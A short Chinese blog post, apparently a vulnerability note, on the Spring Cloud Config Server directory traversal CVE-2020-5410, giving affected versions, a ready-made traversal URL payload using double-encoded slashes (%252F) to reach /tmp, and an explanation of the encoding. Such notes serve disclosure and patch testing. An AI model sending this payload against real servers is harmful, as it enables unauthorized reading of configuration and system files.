Spring Cloud Config Server 目录遍历漏洞（CVE-2020-5410）

Spring Cloud Config Server 目录遍历漏洞（CVE-2020-5410)

概述
较旧的不受支持的版本允许应用程序通过 spring-cloud-config-server 模块提供任意配置文件

影响范围
2.1.x<Spring Cloud Config版本 <2.2.x

目标站点

目录遍历
pyload:

http://xx.xx/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%23/666

其中/两次URL加密%252F，#一次URL加密%23

posted @ 2022-02-15 21:43 LinkPoc 阅读(696) 评论(0) 收藏举报

刷新页面返回顶部